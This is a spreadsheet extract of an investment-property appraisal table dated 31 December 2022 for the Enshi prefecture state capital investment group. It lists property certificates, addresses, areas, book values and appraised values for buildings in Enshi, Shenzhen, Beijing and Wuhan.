{"text_format":"3","workbook":"xls","n_sheets":2,"sheets":["4-5-2投资性房地产","00000000"],"not_rendered":{"external_links":8,"defined_names":18,"comments":4},"read":"whole","date_system":"1900","formulas":"cached_only"}

{"sheet":"4-5-2投资性房地产","index":0,"n_rows":213,"n_cols":32,"rows_kept":213,"merged":[[0,0,0,31],[1,0,1,31],[3,0,3,23],[4,0,5,0],[4,1,5,1],[4,2,5,2],[4,3,5,3],[4,4,5,4],[4,5,5,5],[4,6,5,6],[4,7,5,7],[4,8,5,8],[4,9,5,9],[4,10,5,10],[4,11,5,11],[4,12,5,12],[4,13,5,13],[4,14,5,14],[4,15,5,15],[4,16,5,16],[4,17,5,17],[4,18,5,18],[4,19,5,19],[4,20,5,20],[4,21,5,21],[4,22,5,22],[4,23,5,23],[4,24,5,24],[4,25,5,25],[4,26,5,26],[4,27,5,27],[4,28,5,28],[4,29,5,29],[4,30,5,30],[4,31,5,31],[6,31,7,31],[25,0,27,0],[25,1,27,1],[28,0,29,0],[28,1,29,1],[36,0,37,0],[36,6,37,6],[95,31,99,31],[100,0,101,0],[100,1,101,1],[100,4,101,4],[100,26,101,26],[100,27,101,27],[100,28,101,28],[100,29,101,29],[100,30,101,30],[100,31,101,31],[114,0,115,0],[114,1,115,1],[114,27,115,27],[114,28,115,28],[114,29,115,29],[114,30,115,30],[120,0,121,0],[120,1,121,1],[120,4,121,4],[120,6,121,6],[120,7,121,7],[120,26,121,26],[120,29,121,29],[120,30,121,30],[120,31,121,31],[123,0,124,0],[123,1,124,1],[123,4,124,4],[123,6,124,6],[123,7,124,7],[165,26,166,26],[165,29,166,29],[165,30,166,30],[165,31,166,31],[167,26,175,26],[167,29,175,29],[167,30,175,30],[177,26,179,26],[177,29,179,29],[177,30,179,30],[177,31,179,31],[178,0,179,0],[182,6,183,6],[211,0,211,31],[212,0,212,21],[213,3,213,21]],"flags":["formulas_cached_only"]}
["投资性房地产评估明细表"]
["2022-12-31"]
[{"$nulls":31},"表4-5"]
["产权持有单位：恩施州国有资本投资运营集团有限公司",{"$nulls":30},"金额单位：人民币元"]
["序号","权证编号","房屋名称","来源（外购、自建、自用转入、存货转入等）","位置","对应土地证号","土地面积㎡","用地性质","用途","取得\n日期","到期日","结构","檐高(m)","层高(m)","总层数","所在\n层数","朝向","房产规划用途","登记时间","承租人","开工年月","建成\n年月","计量单位","建筑面积","成本单价(元/m2)","原始入帐价值（转入日公允价值）","账面价值","评估单价","评估价值","增减值","增值率%","备注"]
[]
[1,"鄂（2016）恩施州不动产权第0000174号",null,null,"恩施市施州大道153号2幢A单元0301号",null,218.31,"商业用地","商业服务","2006-09-11","2046-09-11","钢混结构",{"$nulls":3},"3/19",{"$nulls":6},"㎡",{"v":1546.15,"d":"1,546.15"},0,null,{"v":6803100,"d":"6,803,100.00"},{"v":4964,"d":"4,964.00"},{"v":7675088.6,"d":"7,675,088.60"},{"v":871988.6,"d":"871,988.60"},12.82]
[2,"鄂（2016）恩施州不动产权第0000175号",null,null,"恩施市施州大道153号1幢A单元0302号",null,24.28,"商业用地","商业服务","2011-10-01","2051-10-28","钢混结构",{"$nulls":3},"3/19",{"$nulls":6},"㎡",153.93,0,null,{"v":769700,"d":"769,700.00"},{"v":5225,"d":"5,225.00"},{"v":804284,"d":"804,284.00"},{"v":34584,"d":"34,584.00"},4.49]
[3,"恩市国用（2016）第030351号",null,null,"小渡船街道办事处旗峰大道500号",null,{"v":4257.3,"d":"4,257.30"},"工业用地","/","2004-04-01","2054-04-23","/",{"$nulls":3},"/",{"$nulls":6},"㎡","/",0,null,{"v":1681600,"d":"1,681,600.00"},{"v":306,"d":"306.00"},{"v":1302733.8,"d":"1,302,733.80"},{"v":-378866.2,"d":"-378,866.20"},-22.53]
[4,"恩施房权证恩施市字第201610496号",null,null,"旗峰大道500号",null,"/","工业用地","/",null,"/","/",{"$nulls":3},"/",{"$nulls":6},"㎡",186.95,0,null,0,0,0,0,"","已拆除"]
[5,"恩施房权证恩施市字第201610494号",null,null,"旗峰大道500号",null,"/","工业用地","工业用房",null,"/","砖木结构",{"$nulls":3},"1/1",{"$nulls":6},"㎡",{"v":250.8,"d":"250.80"},0,null,{"v":217700,"d":"217,700.00"},{"v":712,"d":"712.00"},{"v":178569.6,"d":"178,569.60"},{"v":-39130.4,"d":"-39,130.40"},-17.97]
[6,"鄂（2017）恩施市不动产权第0003017号",null,null,"三孔桥路110号1幢101、201号",null,530.87,"城镇住宅用地","住宅",null,"2047-03-25","混合结构",{"$nulls":3},"1-2",{"$nulls":6},"㎡",218.31,0,null,{"v":1091600,"d":"1,091,600.00"},{"v":5018,"d":"5,018.00"},{"v":1095479.58,"d":"1,095,479.58"},{"v":3879.58,"d":"3,879.58"},0.36]
[7,"鄂（2017）恩施州不动产权第0000024号",null,null,"恩施市施州大道43号（福恩府）1幢1单元101、201、301号",null,327.79,"综合用地","商服住宅","2004-10-01","2054-10-11","钢混结构",{"$nulls":3},"1-3/16",{"$nulls":6},"㎡",{"v":3285.6,"d":"3,285.60"},0,null,{"v":18399400,"d":"18,399,400.00"},{"v":5764,"d":"5,764.00"},{"v":18938198.4,"d":"18,938,198.40"},{"v":538798.4,"d":"538,798.40"},2.93]
[8,"鄂（2018）恩施市不动产权第0007324号",null,null,"恩施市红庙开发区施州大道（红庙下官田）1幢101-701号",null,{"v":4271.71,"d":"4,271.71"},"城镇住宅用地/机关团体用地","综合用房","2000-10-01","2050-10-27","钢混结构",{"$nulls":3},"1-7",{"$nulls":6},"㎡",{"v":5037.32,"d":"5,037.32"},0,null,{"v":25690300,"d":"25,690,300.00"},{"v":5209,"d":"5,209.00"},{"v":26239399.88,"d":"26,239,399.88"},{"v":549099.88,"d":"549,099.88"},2.14]
[9,"鄂（2017）恩施州不动产权第0000941号",null,null,"恩施市舞阳街道办事处舞阳大道2号2幢-101-104号",null,178.34,"划拨办公","办公用房",null,"/","混合结构",{"$nulls":3},"-1-4/5",{"$nulls":6},"㎡",700.48,0,null,{"v":3222200,"d":"3,222,200.00"},{"v":6175,"d":"6,175.00"},{"v":4325464,"d":"4,325,464.00"},{"v":1103264,"d":"1,103,264.00"},34.24]
[10,"鄂（2017）恩施州不动产权第0000820号",null,null,"恩施市施州大道155号（金安建设大厦）1幢1903号",null,24.51,"商业服务","商业用房","2014-10-01","2054-10-13","钢混结构",{"$nulls":3},"19/20",{"$nulls":6},"㎡",328.61,0,null,{"v":2136000,"d":"2,136,000.00"},{"v":6464,"d":"6,464.00"},{"v":2124135.04,"d":"2,124,135.04"},{"v":-11864.96,"d":"-11,864.96"},-0.56]
[11,"鄂（2017）恩施州不动产权第0016129号",null,null,"桔园街1号1幢101、201、301号",null,{"v":329.1,"d":"329.10"},"划拨办公","办公用房",null,"/","钢混结构",{"$nulls":3},"1-3/3",{"$nulls":6},"㎡",558.51,0,null,{"v":2792600,"d":"2,792,600.00"},{"v":6288,"d":"6,288.00"},{"v":3511910.88,"d":"3,511,910.88"},{"v":719310.88,"d":"719,310.88"},25.76]
[12,"粤（2020）深圳市不动产权第0237953号",null,null,"福田区白沙岭南天大厦第5栋501",null,"/","住宅","住宅","1992-07-01","2062-07-27","钢混结构",{"$nulls":3},"5/19",{"$nulls":6},"㎡",82.11,0,null,{"v":11938800,"d":"11,938,800.00"},{"v":120000,"d":"120,000.00"},{"v":9853200,"d":"9,853,200.00"},{"v":-2085600,"d":"-2,085,600.00"},-17.47]
[13,"粤（2020）深圳市不动产权第0238572号",null,null,"福田区白沙岭南天大厦第5栋502",null,"/","住宅","住宅","1992-07-02","2062-07-27","钢混结构",{"$nulls":3},"5/19",{"$nulls":6},"㎡",94.68,0,null,{"v":13501400,"d":"13,501,400.00"},{"v":120000,"d":"120,000.00"},{"v":11361600,"d":"11,361,600.00"},{"v":-2139800,"d":"-2,139,800.00"},-15.85]
[14,"粤（2020）深圳市不动产权第0237780号",null,null,"福田区白沙岭南天大厦第5栋503",null,"/","住宅","住宅","1992-07-03","2062-07-27","钢混结构",{"$nulls":3},"5/19",{"$nulls":6},"㎡",82.11,0,null,{"v":11938800,"d":"11,938,800.00"},{"v":120000,"d":"120,000.00"},{"v":9853200,"d":"9,853,200.00"},{"v":-2085600,"d":"-2,085,600.00"},-17.47]
[15,"粤（2020）深圳市不动产权第00237989号",null,null,"福田区白沙岭南天大厦第5栋504",null,"/","住宅","住宅","1992-07-04","2062-07-27","钢混结构",{"$nulls":3},"5/19",{"$nulls":6},"㎡",94.68,null,null,{"v":13501400,"d":"13,501,400.00"},{"v":120000,"d":"120,000.00"},{"v":11361600,"d":"11,361,600.00"},{"v":-2139800,"d":"-2,139,800.00"},-15.85]
[16,"粤（2020）深圳市不动产权第0238340号",null,null,"福田区白沙岭南天大厦第5栋505",null,"/","住宅","住宅","1992-07-05","2062-07-27","钢混结构",{"$nulls":3},"5/19",{"$nulls":6},"㎡",82.11,null,null,{"v":11938800,"d":"11,938,800.00"},{"v":120000,"d":"120,000.00"},{"v":9853200,"d":"9,853,200.00"},{"v":-2085600,"d":"-2,085,600.00"},-17.47]
[17,"粤（2020）深圳市不动产权第0238565号",null,null,"福田区白沙岭南天大厦第5栋506",null,"/","住宅","住宅","1992-07-06","2062-07-27","钢混结构",{"$nulls":3},"5/19",{"$nulls":6},"㎡",94.68,null,null,{"v":13501400,"d":"13,501,400.00"},{"v":120000,"d":"120,000.00"},{"v":11361600,"d":"11,361,600.00"},{"v":-2139800,"d":"-2,139,800.00"},-15.85]
[18,"粤（2020）深圳市不动产权第0238334号",null,null,"福田区白沙岭南天大厦第5栋507",null,"/","住宅","住宅","1992-07-07","2062-07-27","钢混结构",{"$nulls":3},"5/19",{"$nulls":6},"㎡",82.11,null,null,{"v":11938800,"d":"11,938,800.00"},{"v":120000,"d":"120,000.00"},{"v":9853200,"d":"9,853,200.00"},{"v":-2085600,"d":"-2,085,600.00"},-17.47]
[19,"粤（2020）深圳市不动产权第0237947号",null,null,"福田区白沙岭南天大厦第5栋508",null,"/","住宅","住宅","1992-07-08","2062-07-27","钢混结构",{"$nulls":3},"5/19",{"$nulls":6},"㎡",94.68,null,null,{"v":13501400,"d":"13,501,400.00"},{"v":120000,"d":"120,000.00"},{"v":11361600,"d":"11,361,600.00"},{"v":-2139800,"d":"-2,139,800.00"},-15.85]
[20,"京（2017）西不动产权第0035165号",null,null,"西城区万博苑6号楼15层1501",null,"/","住宅","住宅",null,"/","钢混结构",{"$nulls":3},"15/26",{"$nulls":6},"㎡",119.43,null,null,{"v":10724800,"d":"10,724,800.00"},{"v":94094,"d":"94,094.00"},{"v":11237646.42,"d":"11,237,646.42"},{"v":512846.42,"d":"512,846.42"},4.78]
[{"$nulls":4},"西城区万博苑6号楼15层1507",null,"/","住宅","住宅",null,"/","钢混结构",{"$nulls":3},"15/26",{"$nulls":6},"㎡",133.69,null,null,{"v":12005400,"d":"12,005,400.00"},{"v":94094,"d":"94,094.00"},{"v":12579426.86,"d":"12,579,426.86"},{"v":574026.86,"d":"574,026.86"},4.78]
[{"$nulls":4},"西城区万博苑6号楼15层1508",null,"/","住宅","住宅",null,"/","钢混结构",{"$nulls":3},"15/26",{"$nulls":6},"㎡",133.69,null,null,{"v":12005400,"d":"12,005,400.00"},{"v":94094,"d":"94,094.00"},{"v":12579426.86,"d":"12,579,426.86"},{"v":574026.86,"d":"574,026.86"},4.78]
[21,"京（2017）朝不动产权第0122284号",null,null,"朝阳区枣营北里32号楼2层32-6",null,"/","办公","办公",null,"/","钢混结构",{"$nulls":3},"2/6",{"$nulls":6},"㎡",{"v":584.2,"d":"584.20"},null,null,{"v":20447000,"d":"20,447,000.00"},{"v":35409,"d":"35,409.00"},{"v":20685937.8,"d":"20,685,937.80"},{"v":238937.8,"d":"238,937.80"},1.17]
[{"$nulls":4},"朝阳区枣营北里32号楼1层32-3",null,"/","办公","办公",null,"/","钢混结构",{"$nulls":3},"1/6",{"$nulls":6},"㎡",{"v":112.7,"d":"112.70"},null,null,{"v":3944500,"d":"3,944,500.00"},{"v":35409,"d":"35,409.00"},{"v":3990594.3,"d":"3,990,594.30"},{"v":46094.3,"d":"46,094.30"},1.17]
[22,"鄂（2017）恩施市不动产权第0016657号",null,null,"恩施市小渡船街道办事处航空花园57号C幢1单元多用房103号",null,{"v":1.9,"d":"1.90"},"城镇住宅用地","住宅",null,"2051-08-10","混合结构",{"$nulls":3},"1/8",{"$nulls":6},"㎡",15.05,null,null,{"v":84300,"d":"84,300.00"},{"v":4579,"d":"4,579.00"},{"v":68913.95,"d":"68,913.95"},{"v":-15386.05,"d":"-15,386.05"},-18.25]
[23,"鄂（2017）恩施市不动产权第0016658号",null,null,"恩施市小渡船街道办事处航空花园57号C幢1单元多用房104号",null,1.43,"城镇住宅用地","住宅",null,"2051-08-10","混合结构",{"$nulls":3},"1/8",{"$nulls":6},"㎡",11.28,null,null,{"v":63200,"d":"63,200.00"},{"v":4579,"d":"4,579.00"},{"v":51651.12,"d":"51,651.12"},{"v":-11548.88,"d":"-11,548.88"},-18.27]
[24,"鄂（2017）恩施市不动产权第0016678号",null,null,"恩施市小渡船街道办事处航空花园57号C幢1单元多用房101号",null,1.43,"城镇住宅用地","住宅",null,"2051-08-10","混合结构",{"$nulls":3},"1/8",{"$nulls":6},"㎡",11.28,null,null,{"v":63200,"d":"63,200.00"},{"v":4579,"d":"4,579.00"},{"v":51651.12,"d":"51,651.12"},{"v":-11548.88,"d":"-11,548.88"},-18.27]
[25,"鄂（2017）恩施市不动产权第0016728号",null,null,"恩施市小渡船街道办事处航空花园57号C幢1单元多用房102号",null,{"v":1.9,"d":"1.90"},"城镇住宅用地","住宅",null,"2051-08-10","混合结构",{"$nulls":3},"1/8",{"$nulls":6},"㎡",15.05,null,null,{"v":84300,"d":"84,300.00"},{"v":4579,"d":"4,579.00"},{"v":68913.95,"d":"68,913.95"},{"v":-15386.05,"d":"-15,386.05"},-18.25]
[26,"鄂（2017）恩施市不动产权第0016729号",null,null,"恩施市小渡船街道办事处航空花园57号C幢1单元车库107号",null,4.52,"城镇住宅用地","车库/车位",null,"2051-08-10","混合结构",{"$nulls":3},"1/8",{"$nulls":6},"㎡",35.73,null,null,{"v":69000,"d":"69,000.00"},{"v":70000,"d":"70,000.00"},{"v":70000,"d":"70,000.00"},{"v":1000,"d":"1,000.00"},1.45]
[27,"鄂（2017）恩施市不动产权第0016730号",null,null,"恩施市小渡船街道办事处航空花园57号C幢1单元车库106号",null,4.52,"城镇住宅用地","车库/车位",null,"2051-08-10","混合结构",{"$nulls":3},"1/8",{"$nulls":6},"㎡",35.73,null,null,{"v":69000,"d":"69,000.00"},{"v":70000,"d":"70,000.00"},{"v":70000,"d":"70,000.00"},{"v":1000,"d":"1,000.00"},1.45]
[28,"鄂（2018）恩施市不动产权第0000517号",null,null,"舞阳街道办事处舞阳大街23号",null,{"v":3617.01,"d":"3,617.01"},"机关团体用地","综合用房",null,"/","混合结构",{"$nulls":3},"1-7/7",{"$nulls":6},"㎡",{"v":2277.98,"d":"2,277.98"},null,null,{"v":10478700,"d":"10,478,700.00"},{"v":4922,"d":"4,922.00"},{"v":11212217.56,"d":"11,212,217.56"},{"v":733517.56,"d":"733,517.56"},{"v":7,"d":"7.00"}]
[null,"鄂（2018）恩施市不动产权第0000517号",null,null,"舞阳街道办事处舞阳大街23号",null,null,"机关团体用地","综合用房",null,"/","混合结构",{"$nulls":3},"1-4/4",{"$nulls":6},"㎡",978.56,null,null,{"v":5281100,"d":"5,281,100.00"},{"v":4922,"d":"4,922.00"},{"v":4816472.32,"d":"4,816,472.32"},{"v":-464627.68,"d":"-464,627.68"},{"v":-8.8,"d":"-8.80"}]
[29,"鄂（2018）武汉市武昌不动产权第0002253号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层1号",null,1.67,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",51.21,null,null,{"v":1024200,"d":"1,024,200.00"},{"v":19098,"d":"19,098.00"},{"v":978008.58,"d":"978,008.58"},{"v":-46191.42,"d":"-46,191.42"},-4.51]
[30,"鄂（2018）武汉市武昌不动产权第0001889号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层2号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[31,"鄂（2018）武汉市武昌不动产权第0002254号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层3号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[32,"鄂（2018）武汉市武昌不动产权第0002006号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层4号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[33,"鄂（2018）武汉市武昌不动产权第0001881号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层5号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[34,"鄂（2018）武汉市武昌不动产权第0002008号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层6号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[35,"鄂（2018）武汉市武昌不动产权第0002013号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层7号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[36,"鄂（2018）武汉市武昌不动产权第0002223号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层8号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[37,"鄂（2018）武汉市武昌不动产权第0002220号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层9号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[38,"鄂（2018）武汉市武昌不动产权第0001888号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层10号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[39,"鄂（2018）武汉市武昌不动产权第0001882号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层11号",null,1.67,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",51.21,null,null,{"v":1024200,"d":"1,024,200.00"},{"v":19098,"d":"19,098.00"},{"v":978008.58,"d":"978,008.58"},{"v":-46191.42,"d":"-46,191.42"},-4.51]
[40,"鄂（2018）武汉市武昌不动产权第0002015号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层12号",null,1.67,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",51.21,null,null,{"v":1024200,"d":"1,024,200.00"},{"v":19098,"d":"19,098.00"},{"v":978008.58,"d":"978,008.58"},{"v":-46191.42,"d":"-46,191.42"},-4.51]
[41,"鄂（2018）武汉市武昌不动产权第0002005号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层13号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[42,"鄂（2018）武汉市武昌不动产权第0002024号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层14号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[43,"鄂（2018）武汉市武昌不动产权第0002257号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层15号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[44,"鄂（2018）武汉市武昌不动产权第0002256号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层16号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[45,"鄂（2018）武汉市武昌不动产权第0001880号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层17号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":758000,"d":"758,000.00"},{"v":19098,"d":"19,098.00"},{"v":723814.2,"d":"723,814.20"},{"v":-34185.8,"d":"-34,185.80"},-4.51]
[46,"鄂（2018）武汉市武昌不动产权第0001890号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层18号",null,1.67,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",51.21,null,null,{"v":1024200,"d":"1,024,200.00"},{"v":19098,"d":"19,098.00"},{"v":978008.58,"d":"978,008.58"},{"v":-46191.42,"d":"-46,191.42"},-4.51]
[47,"鄂（2018）武汉市武昌不动产权第0001886号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层19号",null,{"v":1.1,"d":"1.10"},"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",33.68,null,null,{"v":673600,"d":"673,600.00"},{"v":19098,"d":"19,098.00"},{"v":643220.64,"d":"643,220.64"},{"v":-30379.36,"d":"-30,379.36"},-4.51]
[48,"鄂（2018）武汉市武昌不动产权第0001883号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层20号",null,{"v":1.1,"d":"1.10"},"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",33.68,null,null,{"v":673600,"d":"673,600.00"},{"v":19098,"d":"19,098.00"},{"v":643220.64,"d":"643,220.64"},{"v":-30379.36,"d":"-30,379.36"},-4.51]
[49,"鄂（2018）武汉市武昌不动产权第0002009号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层21号",null,{"v":1.1,"d":"1.10"},"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",33.68,null,null,{"v":673600,"d":"673,600.00"},{"v":19098,"d":"19,098.00"},{"v":643220.64,"d":"643,220.64"},{"v":-30379.36,"d":"-30,379.36"},-4.51]
[50,"鄂（2018）武汉市武昌不动产权第0002023号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层22号",null,{"v":1.1,"d":"1.10"},"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",33.68,null,null,{"v":673600,"d":"673,600.00"},{"v":19098,"d":"19,098.00"},{"v":643220.64,"d":"643,220.64"},{"v":-30379.36,"d":"-30,379.36"},-4.51]
[51,"鄂（2018）武汉市武昌不动产权第0001884号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层23号",null,{"v":1.1,"d":"1.10"},"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",33.68,null,null,{"v":673600,"d":"673,600.00"},{"v":19098,"d":"19,098.00"},{"v":643220.64,"d":"643,220.64"},{"v":-30379.36,"d":"-30,379.36"},-4.51]
[52,"鄂（2018）武汉市武昌不动产权第0001885号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层24号",null,{"v":1.1,"d":"1.10"},"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",33.68,null,null,{"v":673600,"d":"673,600.00"},{"v":19098,"d":"19,098.00"},{"v":643220.64,"d":"643,220.64"},{"v":-30379.36,"d":"-30,379.36"},-4.51]
[53,"鄂（2018）武汉市武昌不动产权第0002219号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层25号",null,{"v":1.1,"d":"1.10"},"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",33.68,null,null,{"v":673600,"d":"673,600.00"},{"v":19098,"d":"19,098.00"},{"v":643220.64,"d":"643,220.64"},{"v":-30379.36,"d":"-30,379.36"},-4.51]
[54,"鄂（2018）武汉市武昌不动产权第0002222号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元9层26号",null,{"v":1.1,"d":"1.10"},"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"9/32",{"$nulls":6},"㎡",33.68,null,null,{"v":673600,"d":"673,600.00"},{"v":19098,"d":"19,098.00"},{"v":643220.64,"d":"643,220.64"},{"v":-30379.36,"d":"-30,379.36"},-4.51]
[55,"鄂（2018）武汉市武昌不动产权第0002014号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元28层14号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"28/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":913400,"d":"913,400.00"},{"v":23997,"d":"23,997.00"},{"v":909486,"d":"909,486.00"},{"v":-3914,"d":"-3,914.00"},-0.43,"复式"]
[56,"鄂（2018）武汉市武昌不动产权第0002019号",null,null,"武昌区中南路街丁字桥路文安街中南SOHO城（向阳村城中村改造K地块）/栋1单元28层15号",null,1.24,"商业服务","办公","2014-09-01","2054-09-29","钢混结构",{"$nulls":3},"28/32",{"$nulls":6},"㎡",{"v":37.9,"d":"37.90"},null,null,{"v":913400,"d":"913,400.00"},{"v":23997,"d":"23,997.00"},{"v":909486,"d":"909,486.00"},{"v":-3914,"d":"-3,914.00"},-0.43,"复式"]
